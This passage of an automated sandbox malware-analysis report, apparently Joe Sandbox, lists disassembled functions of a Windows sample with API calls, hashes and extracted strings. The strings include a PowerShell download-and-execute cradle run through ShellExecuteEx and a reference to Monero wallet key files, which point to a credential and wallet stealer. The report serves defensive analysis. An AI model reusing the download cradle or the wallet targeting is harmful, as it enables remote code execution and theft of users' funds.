                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: Windows 11
                            • API String ID: 3225020163-2517555085
                            • Opcode ID: 30ca3a1e4ca74f294ce2360986dea852ec2bf25d257026ae574faaf43cc9a18f
                            • Instruction ID: 386038506bfab182c1c928c2ce982cd3ee0d207d59c5ad28901ecb9f144b5adb
                            • Opcode Fuzzy Hash: 30ca3a1e4ca74f294ce2360986dea852ec2bf25d257026ae574faaf43cc9a18f
                            • Instruction Fuzzy Hash: FC014475A44304BBEB18DBD4EA4AFAEB779EB48701F004464FA54A7284D6709954CB50
                            Function 00E59470 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileA.KERNEL32(>=,80000000,00000003,00000000,00000003,00000080,00000000,?,00E53D3E,?), ref: 00E5948C
                            • GetFileSizeEx.KERNEL32(000000FF,>=), ref: 00E594A9
                            • CloseHandle.KERNEL32(000000FF), ref: 00E594B7
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandleSize
                            • String ID: >=$>=
                            • API String ID: 1378416451-3543398223
                            • Opcode ID: 2b4508218008b164c7932e30bc1c66a369952181350d55afee13eda0104d4a21
                            • Instruction ID: d5686c01e9096b2d2dba81c826230f094d55289bbec275b743f5199548a4d4db
                            • Opcode Fuzzy Hash: 2b4508218008b164c7932e30bc1c66a369952181350d55afee13eda0104d4a21
                            • Instruction Fuzzy Hash: 7BF04439E44308FBDB24DFB0DC89F9EB7BAAB48715F10C554FA21A72C4D6709A458B40
                            Function 00E4A110 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E4A13C
                            • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E4A161
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00E4A181
                            • ReadFile.KERNEL32(000000FF,?,00000000,00E4148F,00000000), ref: 00E4A1AA
                            • LocalFree.KERNEL32(00E4148F), ref: 00E4A1E0
                            • CloseHandle.KERNEL32(000000FF), ref: 00E4A1EA
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                            • String ID:
                            • API String ID: 2311089104-0
                            • Opcode ID: 14e635a9e63c20819067c61067d843b917eb171fe4f2e50ed4c126de9f6159c4
                            • Instruction ID: d08e12de91ff0466d91fc573e8cd15f7327c7eb32abd3e042adb2b016136bbaf
                            • Opcode Fuzzy Hash: 14e635a9e63c20819067c61067d843b917eb171fe4f2e50ed4c126de9f6159c4
                            • Instruction Fuzzy Hash: 4A312CB4A41209EFDB14CFA4D985BEEB7B5BF48314F108168E911A73C0D774AA81CFA1
                            Function 00E549D0 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcat.KERNEL32(?,009CEE00), ref: 00E54A2B
                              • Part of subcall function 00E58F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E58F9B
                            • lstrcat.KERNEL32(?,00000000), ref: 00E54A51
                            • lstrcat.KERNEL32(?,?), ref: 00E54A70
                            • lstrcat.KERNEL32(?,?), ref: 00E54A84
                            • lstrcat.KERNEL32(?,009BBDE0), ref: 00E54A97
                            • lstrcat.KERNEL32(?,?), ref: 00E54AAB
                            • lstrcat.KERNEL32(?,009CE518), ref: 00E54ABF
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                              • Part of subcall function 00E58F20: GetFileAttributesA.KERNEL32(00000000,?,00E41B94,?,?,00E6577C,?,?,00E60E22), ref: 00E58F2F
                              • Part of subcall function 00E547C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00E547D0
                              • Part of subcall function 00E547C0: RtlAllocateHeap.NTDLL(00000000), ref: 00E547D7
                              • Part of subcall function 00E547C0: wsprintfA.USER32 ref: 00E547F6
                              • Part of subcall function 00E547C0: FindFirstFileA.KERNEL32(?,?), ref: 00E5480D
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                            • String ID:
                            • API String ID: 2540262943-0
                            • Opcode ID: 5280e79f02420008ab15e148a65e478705285fb676b0f38e8ad229acd0d527a2
                            • Instruction ID: b9eb2b9487e102665ac0ba54e15997a6d1be848ece798bae8fa7b55e5f0551a0
                            • Opcode Fuzzy Hash: 5280e79f02420008ab15e148a65e478705285fb676b0f38e8ad229acd0d527a2
                            • Instruction Fuzzy Hash: 033184F690020867CB28FBB0DD85EDDB37CAB58701F404999B616B6085DEB497CDCB94
                            Function 00E52EE0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00E5AA50: lstrcpy.KERNEL32(00E60E1A,00000000), ref: 00E5AA98
                              • Part of subcall function 00E5ACC0: lstrlen.KERNEL32(?,009C99B8,?,\Monero\wallet.keys,00E60E1A), ref: 00E5ACD5
                              • Part of subcall function 00E5ACC0: lstrcpy.KERNEL32(00000000), ref: 00E5AD14
                              • Part of subcall function 00E5ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AD22
                              • Part of subcall function 00E5AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E5AC82
                              • Part of subcall function 00E5AC30: lstrcat.KERNEL32(00000000), ref: 00E5AC92
                              • Part of subcall function 00E5ABB0: lstrcpy.KERNEL32(?,00E60E1A), ref: 00E5AC15
                            • ShellExecuteEx.SHELL32(0000003C), ref: 00E52FD5
                            Strings
                            • ')", xrefs: 00E52F03
                            • <, xrefs: 00E52F89
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00E52F54
                            • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00E52F14
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                            • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            • API String ID: 3031569214-898575020
                            • Opcode ID: c9beb32882bf68b8889b76beeb3a3bedeaba43e1cdbe63ba7dff3e253fa55408
                            • Instruction ID: 14aeb71ad528374d5770462919d05e4738f8ec371293149614abf8433a2f28be
                            • Opcode Fuzzy Hash: c9beb32882bf68b8889b76beeb3a3bedeaba43e1cdbe63ba7dff3e253fa55408
                            • Instruction Fuzzy Hash: 47411E709002089BDB14FFA0C862BDDBBB9AF14341F446A69E81576192DF712A4DCF91
                            Function 00E54300 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                            Download Yara Rule
                            APIs
                            • RegOpenKeyExA.ADVAPI32(80000001,009CE5F8,00000000,00020119,?), ref: 00E54344
                            • RegQueryValueExA.ADVAPI32(?,009CED58,00000000,00000000,00000000,000000FF), ref: 00E54368
                            • RegCloseKey.ADVAPI32(?), ref: 00E54372
                            • lstrcat.KERNEL32(?,00000000), ref: 00E54397
                            • lstrcat.KERNEL32(?,009CED70), ref: 00E543AB
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$CloseOpenQueryValue
                            • String ID:
                            • API String ID: 690832082-0
                            • Opcode ID: d54cbcc89437be59e506243467490f886bfd3659c763444bea64f5e90fe0ad38
                            • Instruction ID: 05c3c61b41ba8191edb3288c1ed3a5ebc126745cdedf8d2fdf406e911e8e8d63
                            • Opcode Fuzzy Hash: d54cbcc89437be59e506243467490f886bfd3659c763444bea64f5e90fe0ad38
                            • Instruction Fuzzy Hash: 86419CB69101086BDF28EBA0ED46FEE737DAB48700F004968B725671C5EAB556CCCBD1
                            Function 00EBCBE2 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: dllmain_raw$dllmain_crt_dispatch
                            • String ID:
                            • API String ID: 3136044242-0
                            • Opcode ID: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                            • Instruction ID: 13c28917bd400b94959a4beb9a52923f8167cfe98e239e3450d72340f840c0c4
                            • Opcode Fuzzy Hash: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                            • Instruction Fuzzy Hash: F3219F72D08619ABDB229F15CC419FFBEA9EBA1798B256115F80C77211C3308D41CFA0
                            Function 00E57F90 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E57FC7
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00E57FCE
                            • RegOpenKeyExA.ADVAPI32(80000002,009BCA80,00000000,00020119,?), ref: 00E57FEE
                            • RegQueryValueExA.ADVAPI32(?,009CE458,00000000,00000000,000000FF,000000FF), ref: 00E5800F
                            • RegCloseKey.ADVAPI32(?), ref: 00E58022
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID:
                            • API String ID: 3225020163-0
                            • Opcode ID: 2cff2c7cdd5397eba361ed973ea7e8558cd500c1899fd3c2bff6829754c25834
                            • Instruction ID: be148e4ea3750cf58056be72e244827fdd49ffd47eed93d0f7b6ab766ed8d684
                            • Opcode Fuzzy Hash: 2cff2c7cdd5397eba361ed973ea7e8558cd500c1899fd3c2bff6829754c25834
                            • Instruction Fuzzy Hash: 56118FB1A44205ABE714CB84DE46FBFF7B8EB04B11F104629FA21B72C4D7B558448BA1
                            Function 00E593F0 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                            Download Yara Rule
                            APIs
                            • StrStrA.SHLWAPI(009CEDD0,00000000,00000000,?,00E49F71,00000000,009CEDD0,00000000), ref: 00E593FC
                            • lstrcpyn.KERNEL32(01117580,009CEDD0,009CEDD0,?,00E49F71,00000000,009CEDD0), ref: 00E59420
                            • lstrlen.KERNEL32(00000000,?,00E49F71,00000000,009CEDD0), ref: 00E59437
                            • wsprintfA.USER32 ref: 00E59457
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpynlstrlenwsprintf
                            • String ID: %s%s
                            • API String ID: 1206339513-3252725368
                            • Opcode ID: 2fcab531683ffabfe0c567710ebf75c066ba4c43e2371a1c23dea19893247143
                            • Instruction ID: ee2dd1937faafa3134db4ddc6a5e8e3101cc5bd9666d3cc031f06f9ff4e03928
                            • Opcode Fuzzy Hash: 2fcab531683ffabfe0c567710ebf75c066ba4c43e2371a1c23dea19893247143
                            • Instruction Fuzzy Hash: 81011E75500248FFCB08DFA8C984EAEBB79EB48304F108658F9199B385D731AA40DB90
                            Function 00E412A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E412B4
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00E412BB
                            • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00E412D7
                            • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00E412F5
                            • RegCloseKey.ADVAPI32(?), ref: 00E412FF
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000012C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.0000000001399000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095965847.00000000013D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096204817.00000000013D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096302079.0000000001570000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2096314735.0000000001571000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID:
                            • API String ID: 3225020163-0
                            • Opcode ID: 5877fe36a548bdd12a74cb7f41ffd9af11ca9c969fec48267147e2ad458fa37a
                            • Instruction ID: 6e31782d98d1f03e06353d85c3271263c4360f79a4913a93f815c7032744a08e
                            • Opcode Fuzzy Hash: 5877fe36a548bdd12a74cb7f41ffd9af11ca9c969fec48267147e2ad458fa37a
                            • Instruction Fuzzy Hash: 6A011D79A40209BFDB14DFD0D949FAEB7B9AB48700F0041A4FA15972C4D6709A409B90
                            Function 00E5CB7E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2095772102.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                            • Associated: 00000000.00000002.2095759467.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2095772102.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
